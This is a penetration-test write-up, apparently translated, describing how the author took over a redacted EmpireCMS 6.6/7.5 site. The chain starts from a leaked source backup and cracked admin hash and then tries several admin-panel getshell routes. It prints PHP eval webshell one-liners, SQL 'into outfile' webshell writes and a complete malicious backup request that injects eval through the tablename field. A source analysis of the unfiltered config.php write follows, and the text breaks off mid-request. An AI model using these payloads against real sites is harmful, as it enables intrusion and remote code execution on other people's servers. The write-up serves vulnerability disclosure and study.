Title: Record once the source code leaks to getshell (II)

0x00 Introduction

The vulnerability described in the article has been submitted to the vulnerability platform, and all malicious operations have been restored

0x01 Source code leak

http://www.xxx.com.cn/www.zip The old rules to get the source code and first pass the keywords to find sensitive information

key

pwd

passwd

After finding password for a long time, I couldn't find a valid password

Finally, see the information about CMS in robots.txt - EmpireCMS

After querying, you can find out that it is open source cms, and directly query the data table structure on Baidu.

I know that the administrator record table is phome_enewsuser, search globally in the source code

0x02 Sensitive information leakage

Click in to get the administrator username, password hash and salt value

Directly solve md5 to get the password

After Kite/kite gets the password, it finds the background address. Since it is open source, it will be available at Baidu.

Take a look at the directory and do not modify the background address, so you can access it directly

http://www.xxx.com.cn/e/admin/

The specific version number is 6.6

0x04 Historical Vulnerability

After logging in to the background, because it is an open source CMS, historical vulnerabilities are the key to penetration.

Search for empireCMS vulnerabilities directly and start reproducing historical vulnerabilities

1.Background-Template-Public Template-JS Call Login Template Getshell

It has ended before it started

Table 'hdm1010482_db.phome_enewstempgroup' doesn't exist good guy, is this the table deleted?

2.Backend data table and system model-import database model getshell

There is a security vulnerability in the LoadInMod function of the e/class/moddofun.php file in EmpireCMS 7.5 and previous versions. An attacker can use this vulnerability to upload any file.

Create a new test.php.mod file locally, with the contents of

?php file_put_contents('lyy.php','?php @eval(\$_POST['lyy']);');Fill in any table name and select Import immediately

Another table does not exist, GG

3. Backup and restore data in the background - execute the sql statement getshell

There is a code injection vulnerability in the admindbDoSql.php file in EmpireCMS7.5 and previous versions.

That is, the background provides an SQL statement execution

As long as the server mysql configuration secure_file_priv is incorrect, you can write files to the server.

Payloadselect '?php @eval($_POST[123])?' into outfile 'absolute path /e/admin/lyy.php' Because you want to write a file to the site, you must know the absolute path.

Because it is no echo execution, it cannot obtain part of the path through the show mysql variable, so it is also passed

show variables like '%datadir%';

4. Backup and restore data - Backup data getshell

empirecms When the database is backed up in the background, the database table name is not verified. By modifying the database table name, any code execution can be achieved.

Select any table and start backing up and grabbing

Change the tablename field to payload

@eval($_POST[123]) request package

POST /e/admin/ebak/phome.php HTTP/1.1

Host: www.xxx.com.cn

Content-Length: 285

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

Origin: http://www.xxx.com.cn

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Referer: http://www.xxx.com.cn/e/admin/ebak/ChangeTable.php?mydbname=hdm1010482_db

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Cookie: bxubwecmsdodbdata=empirectms; bxubwloginuserid=1; bxubwloginusername=Kite; bxubwloginlevel=1; bxubweloginlic=empirectmslic; bxubwloginadminstyleid=1; bxubwloginrnd=F3JiUXpyeXm6mWPTsdUG; bxubwlogincmsckpass=e816ccfcb01f4ed8ee0ad531de6fa67c; bxubwtruelogintime=1640762619; bxubwlogintime=1640762630

Connection: close

phome=DoEbakmydbname=hdm1010482_dbbaktype=phpinfo()filesize=300bakline=500autoauf=1bakstru=1dbchar=gbkbakdatatype=1mypath=hdm1010482_db_20211229152350insertf=replacewaitbaktime=0readme=autofield=tablename%5B%5D=@eval($_POST[123])chkall=onSubmit=%BF%AA%CA%BC%B1%B8%B7%DD echo to get the backup folder name

hdm1010482_db_20211229152350webshell connection config.php under the backup folder

http://www.xxx.cn/e/admin/ebak/bdata/hdm1010482_db_20211229152350/config.php successfully getshell

Principle Analysis

Because I have the source code in my hand, I followed this loophole

First, search config.php directly and find it

File write operation in Ebak_DoEbak in e/admin/ebak/class/functions.php file

$string='?php

\$b_table=\''.$b_table.'\';

'.$d_table.'

\$b_baktype='.$add['baktype'].';

\$b_filesize='.$add['filesize'].';

\$b_bakline='.$add['bakline'].';

\$b_autoauf='.$add['autoauf'].';

\$b_dbname=\''.$dbname.'\';

\$b_stru='.$bakstru.';

\$b_strufour='.$bakstrufour.';

\$b_dbchar=\''.addslashes($add['dbchar']).'\';

\$b_beover='.$beover.';

\$b_insertf=\''.addslashes($insertf).'\';

\$b_autofield=\','.addslashes($add['autofield']).',\';

\$b_bakdatatype='.$bakdatatype.';

?';

$cfile=$bakpath.'/'.$add['mypath'].'/config.php';

WriteFiletext_n($cfile,$string);

You can see that the $d_table variable is directly spliced

Let's take a look at writing function WriteFiletext_n

There is no filtering for the write content, so you just need to know how to control the value of the $d_table variable

crtl+left button follows above

And $count is the number of $tablename, $tablename is the key value of tablename in $add

Find the location where the Ebak_DoEbak function is called and know that $add is $_POST

It is clear that he processed the tablename of the POST parameter and generated two variables

$b_table and $d_table, where $b_table is wrapped in double quotes and cannot be used

However, $d_table is wrapped without double quotes and is written directly to the .php file without arbitrary filtering, resulting in the command execution

Why isn't it another parameter?

Most other parameters are wrapped in double quotes

Parameters that are not wrapped in double quotes are forced to int, if str is passed, it will return 0, so pass

3's follow-up

After obtaining the real path of the site through vulnerability 4, I constructed the SQL statement and tried to directly webshell to the site.

select '?php phpinfo();' into outfile '/data/home/hmu072095/htdocs/e/admin/lyy.php' Although a database connection error was exploded, the statement was successfully executed, but the content written was replaced with empty

Can be accessed successfully but without content

Can write normal characters

select 'test' into outfile '/data/home/hmu072095/htdocs/e/admin/1.txt'

The preliminary judgment is that the php tag has been filtered and other writing methods have been tried to bypass it.

1.select '? phpinfo();' into outfile '/data/home/hmu072095/htdocs/e/admin/ly.php'

2.select 'script language='php' phpinfo(); /script' into outfile '/data/home/hmu072095/htdocs/e/admin/ly.php'

3.select '?php @eval($_POST[1])?' into outfile '/data/home/hmu072095/htdocs/e/admin/ly.php' Only the last asp style is successfully written

Trying to access cannot be executed. Check the default PHP short tag configuration item on Linux, and it is gone.

Summary

1. The target site was scanned through the Yujian Directory scanning tool. It was found that the website's backup file www.zip was leaked, and the source code analysis was downloaded locally.

2. Load the source code through phpstorm and search for keywords key, pwd, password, passwd, and no relevant password was found. Through robots.txt, it was found that it was EmpireCMS

3. Search the data table structure of EmpireCMS through Baidu, and found that phome_enewsuser is the administrator record table. Through global batch search of the phome_enewsuser keyword, it was found that the user name and password of the website administrator of the source code were leaked. The plain text was obtained by md5 decryption.

4. Enter the default background path/admin to see the background login page, enter the obtained username and password to log in to the background.

5. Prepare to write a sentence at the website background-template-public template-js call login template. I found that the table does not exist and the shell cannot be written.

6. In the website background-system-data table and system template-manage data table-import system template, template file name: test.php.mod, and the stored data table name is: phome_ecm_111. After importing, it is found that the table does not exist and cannot be written to the shell.

test.php.mod:

?php file_put_contents('lyy.php','?php @eval(\$_POST['lyy']);');

7. In the website background-system-backup and restore data-execute SQL statements and write a sentence. The prerequisites require: MySQL configuration secure_file_priv is improper, and you need to know the absolute path of the website and the version of EmpireCMS=7.5. The absolute path of the website cannot be obtained here and the shell cannot be written.

show variables like '%datadir%'; //View the absolute path of the website

select '?php @eval($_POST[123])?' into outfile 'Absolute path/e/admin/lyy.php' //Write a sentence

8. When empirecms version 7.5 and previous versions back up the database in the background, the database table name was not verified. Any code execution can be achieved by modifying the database table name. Then, in the website background - system - backup and restore data - restore data - select any table to start backup and packet capture interception. Pay attention to the backup directory. If the directory does not exist, the system will automatically generate a directory name. Catch packets and intercept them, modify them, and send requests.

POST /e/admin/ebak/phome.php HTTP/1.1

Host: www.xxx.com.cn

Content-Length: 285

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

Origin: http://www.xxx.com.cn

Content-Type: application/x-www-form-urlen